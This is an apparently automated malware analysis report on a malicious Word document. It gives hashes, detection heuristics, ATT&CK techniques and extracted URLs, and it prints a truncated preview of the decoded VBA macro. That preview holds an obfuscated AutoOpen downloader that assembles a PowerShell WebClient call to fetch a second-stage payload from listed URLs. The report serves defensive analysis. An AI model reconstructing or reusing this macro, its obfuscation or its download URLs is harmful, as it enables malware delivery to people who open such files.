Office (OLE) malware analysis — malicious · 6f9034646e6fcead

MALICIOUS

Office (OLE)

97.5 KB Created: 2018-02-08 08:46:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 0f0eb3c733a664c53695ea7fd1bc1519 SHA-1: 9015ed3922be9c6e43e647a72014de74d73cb984 SHA-256: 6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1cb0e0

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a payload, as indicated by critical heuristic firings. The script attempts to download and execute a second-stage payload from a suspicious URL, which is reconstructed as 'https://www.blueyachtchiMcv5.com/oMgoZ/Y4iMDnJQlYpbrbfpXzw'.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMDnJQlYpbrbfpXzw In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22085 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22085 bytes
SHA-256: `202da9918b22895c2548961f73fa3c9bf83722f7ea40e972332192a5a7e3fa5e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "UXEKrTcYdjApzI" Sub AutoOpen() On Error Resume Next GhKJTcPUw = WwYGGoFlTaR - CGGOwmcLbKmlpl / (8656853 + GQGvZalCkHiC - 6899216 + GFXHiED) FdcrnALLn = UvWfDUWab - DirHabVEjN / (6512393 + ofBmdDla - 4937609 + wqJHNaDlBjCjz) amVRMfHia = NGqdQrSoBvLi - wTNuAvL / (195088 + FjbAImZ - 9164132 + MWHvAXwmt) Application.Run "SssbuNrRrEn", JpruannMCh isBonsmXz = kGiOiJBJCPjjOF - zLtCSqzNBdI / (473277 + siOkobLLd - 1513620 + mzNtXKCdwL) ojsVfImsh = ZHkRTBwrnuSV - UPScDqr / (5163821 + GEDCVPJSYSw - 4326410 + fOvaVMKpCtTcYF) End Sub Function JpruannMCh() On Error Resume Next AsWoNDtOSr = KoCvtpnjiP - UMnpssIJTvZDc / (8103294 + CRsrtRjKXRtqOz - 3326745 + wYVXWYrhIa) WfDPKR = caklZFvnWqqV - lCQYzBtMCZ / (5335036 + GSbdaKjThGj - 7373223 + TlTJvfHDzmT) bBKQAnbCY = SiGhWaAJ - TnUJvjHC / (8140392 + TisfQaCGuUa - 1646542 + HVHbclKjjdZ) UDzCsMhb = nLsjMjaAjtv + Mid(("ww+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace i'+'MPjPIiMP,[Char]92 -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]11NQAhUbDslUVNDrtZtqFwzidva"), 3, 137) jaFiSm = GAdaCqGT - GofKGMnnEi / (3112661 + wjBTfSbCHvU - 4923864 + ZGshYmf) czpWmUz = McotprmMMtVlc - RcHXYiRM / (2132570 + GJhFvGfsko - 7386360 + MZpapqvB) KraVTsTmwFJ = oYRpQaBNAZARTn - KjQFNcAnVJP / (6474296 + zpaRJWRkPPfj - 5815884 + jOmpsmJQIZp) ZEFrjkjH = wzAzwAB + Mid(("Oi'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.coYtRwtjPCtQPjtDmVFudQlhGKBwauURjRu"), 2, 185) NqtzKtBTW = VvuQlZjwQYjUWv - jjAbVAdzTk / (5958351 + KOYQDhvQOWroP - 820464 + XMMLdwvjiz) BGREI = mzrvajGl - jsIfnbiKKo / (2431539 + RcGmHYBq - 2755715 + uSwuwYSvLhi) zBSVSssO = nfEhYCSlZpl - VUlITHFuLFzqis / (5561257 + rOdihmo - 5249937 + ZAzYcEEjCZdn) YivIOm = VnlvfAsUQLwiI + Mid(("GkP88+[cHAR]50+[cHAR]122),[cHAR]124 -CRePLace 'j3x',[cHAR]36) )IIsiiEzdVAW"), 4, 61) AvwfC = jZMuLLGNijJZtH - WiBtJjS / (9864798 + hlaBzSGtV - 5241455 + ZMissaoqzd) MtJQWC = ivWNlhoESNat - ZlEPQZQE / (3531688 + jJAIAjrcBowDi - 5983194 + hZFQJGzSWTGV) wzfbEs = aXNfQHqElY - ValYEOWGZfiAK / (7674964 + hjqiotNR - 348210 + bTmXojwASvi) NUzfsGU = cDcjTihN + Mid(("oYHjCEMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0nKOfWVGs"), 7, 180) fBOVG = HaJNHjtHIjtdu - jkwmArsbLFcV / (8426173 + QXKHYbfwfSpQYn - 4880575 + hlNNQLvEWLwf) dKHzPjiiBw = EllrzrlYl - SDnFfzj / (3646208 + BYYrIid - 1027922 + FlMdzhahEYY) CJvhbhUBi = nNvjuKcFPHmsui - ftcNWlKTAspDG / (5931512 + tKuHNLcLOUBzLw - 9793562 + iVqunbKCKd) QocZZzH = bOIzzwurWD + Mid(("CPiKUEYmiMP+iMP.Net.iMP'+'+iPLPllvajurvXTsfj"), 8, 21) wUmYSqPnczw = NtVmwVBYHiPj - RArwkRhX / (1939287 + iYtkXVwFL - 8379375 + NRhYfYt) QiiuZjf = zYHrHvbGp - NVLDfqNEkiD / (2041316 + DsFEjKYEsnI - 2434329 + XhmovOGYzVtKl) KNKPwwDYDiL = LanPLmuDwCrsw - bVhCrqTfR / (9296715 + pDEFWLtzTMiE - 4737205 + ZuTikwDSpzcnrS) jtiuZvh = vnEGWaRNbwmQfD + Mid(("MwoYIFZ'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EktnvKL"), 8, 160) isiIzo = zRJERvz - hzfWOGdiTaCwjV / (2438817 + bqEVGswIpkAKi - 7510262 + zYiarBz) PZRpThdQn = kUtXWrjXcE - cariqpAWj / (5718245 + SEjZDXw - 8911272 + pcVTANVbQJ) jnijmKZ = YFMKbIus - qfSrdBorzoIZ / (6482714 + bzEXdcUZFXRi - 2472841 + WzudFIdKKiqwY) jMjaNWuoBzR = XfIrjVjqwcrzuc + Mid(("kFhKZdpXrtfqjFzZziMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPatbAChdUGdjVNjElPToZ"), 18, 63) zwcUYjaAT = RRZvZvpzU - tfTZGRpZhiEpvd / (4223806 + rqGLbKMpqLk - 2788915 + uJaJiiW) sSCYaZFpCT = RPTUzDlLb - wZvEwrJYjS / (57 ... (truncated)

SHA-256: 202da9918b22895c2548961f73fa3c9bf83722f7ea40e972332192a5a7e3fa5e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UXEKrTcYdjApzI"
Sub AutoOpen()
On Error Resume Next
GhKJTcPUw = WwYGGoFlTaR - CGGOwmcLbKmlpl / (8656853 + GQGvZalCkHiC - 6899216 + GFXHiED)
FdcrnALLn = UvWfDUWab - DirHabVEjN / (6512393 + ofBmdDla - 4937609 + wqJHNaDlBjCjz)
amVRMfHia = NGqdQrSoBvLi - wTNuAvL / (195088 + FjbAImZ - 9164132 + MWHvAXwmt)
Application.Run "SssbuNrRrEn", JpruannMCh
isBonsmXz = kGiOiJBJCPjjOF - zLtCSqzNBdI / (473277 + siOkobLLd - 1513620 + mzNtXKCdwL)
ojsVfImsh = ZHkRTBwrnuSV - UPScDqr / (5163821 + GEDCVPJSYSw - 4326410 + fOvaVMKpCtTcYF)
End Sub
Function JpruannMCh()
On Error Resume Next
AsWoNDtOSr = KoCvtpnjiP - UMnpssIJTvZDc / (8103294 + CRsrtRjKXRtqOz - 3326745 + wYVXWYrhIa)
WfDPKR = caklZFvnWqqV - lCQYzBtMCZ / (5335036 + GSbdaKjThGj - 7373223 + TlTJvfHDzmT)
bBKQAnbCY = SiGhWaAJ - TnUJvjHC / (8140392 + TisfQaCGuUa - 1646542 + HVHbclKjjdZ)
UDzCsMhb = nLsjMjaAjtv + Mid(("ww+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace  i'+'MPjPIiMP,[Char]92  -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]11NQAhUbDslUVNDrtZtqFwzidva"), 3, 137)
jaFiSm = GAdaCqGT - GofKGMnnEi / (3112661 + wjBTfSbCHvU - 4923864 + ZGshYmf)
czpWmUz = McotprmMMtVlc - RcHXYiRM / (2132570 + GJhFvGfsko - 7386360 + MZpapqvB)
KraVTsTmwFJ = oYRpQaBNAZARTn - KjQFNcAnVJP / (6474296 + zpaRJWRkPPfj - 5815884 + jOmpsmJQIZp)
ZEFrjkjH = wzAzwAB + Mid(("Oi'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.coYtRwtjPCtQPjtDmVFudQlhGKBwauURjRu"), 2, 185)
NqtzKtBTW = VvuQlZjwQYjUWv - jjAbVAdzTk / (5958351 + KOYQDhvQOWroP - 820464 + XMMLdwvjiz)
BGREI = mzrvajGl - jsIfnbiKKo / (2431539 + RcGmHYBq - 2755715 + uSwuwYSvLhi)
zBSVSssO = nfEhYCSlZpl - VUlITHFuLFzqis / (5561257 + rOdihmo - 5249937 + ZAzYcEEjCZdn)
YivIOm = VnlvfAsUQLwiI + Mid(("GkP88+[cHAR]50+[cHAR]122),[cHAR]124  -CRePLace 'j3x',[cHAR]36) )IIsiiEzdVAW"), 4, 61)
AvwfC = jZMuLLGNijJZtH - WiBtJjS / (9864798 + hlaBzSGtV - 5241455 + ZMissaoqzd)
MtJQWC = ivWNlhoESNat - ZlEPQZQE / (3531688 + jJAIAjrcBowDi - 5983194 + hZFQJGzSWTGV)
wzfbEs = aXNfQHqElY - ValYEOWGZfiAK / (7674964 + hjqiotNR - 348210 + bTmXojwASvi)
NUzfsGU = cDcjTihN + Mid(("oYHjCEMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0nKOfWVGs"), 7, 180)
fBOVG = HaJNHjtHIjtdu - jkwmArsbLFcV / (8426173 + QXKHYbfwfSpQYn - 4880575 + hlNNQLvEWLwf)
dKHzPjiiBw = EllrzrlYl - SDnFfzj / (3646208 + BYYrIid - 1027922 + FlMdzhahEYY)
CJvhbhUBi = nNvjuKcFPHmsui - ftcNWlKTAspDG / (5931512 + tKuHNLcLOUBzLw - 9793562 + iVqunbKCKd)
QocZZzH = bOIzzwurWD + Mid(("CPiKUEYmiMP+iMP.Net.iMP'+'+iPLPllvajurvXTsfj"), 8, 21)
wUmYSqPnczw = NtVmwVBYHiPj - RArwkRhX / (1939287 + iYtkXVwFL - 8379375 + NRhYfYt)
QiiuZjf = zYHrHvbGp - NVLDfqNEkiD / (2041316 + DsFEjKYEsnI - 2434329 + XhmovOGYzVtKl)
KNKPwwDYDiL = LanPLmuDwCrsw - bVhCrqTfR / (9296715 + pDEFWLtzTMiE - 4737205 + ZuTikwDSpzcnrS)
jtiuZvh = vnEGWaRNbwmQfD + Mid(("MwoYIFZ'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EktnvKL"), 8, 160)
isiIzo = zRJERvz - hzfWOGdiTaCwjV / (2438817 + bqEVGswIpkAKi - 7510262 + zYiarBz)
PZRpThdQn = kUtXWrjXcE - cariqpAWj / (5718245 + SEjZDXw - 8911272 + pcVTANVbQJ)
jnijmKZ = YFMKbIus - qfSrdBorzoIZ / (6482714 + bzEXdcUZFXRi - 2472841 + WzudFIdKKiqwY)
jMjaNWuoBzR = XfIrjVjqwcrzuc + Mid(("kFhKZdpXrtfqjFzZziMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPatbAChdUGdjVNjElPToZ"), 18, 63)
zwcUYjaAT = RRZvZvpzU - tfTZGRpZhiEpvd / (4223806 + rqGLbKMpqLk - 2788915 + uJaJiiW)
sSCYaZFpCT = RPTUzDlLb - wZvEwrJYjS / (57
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.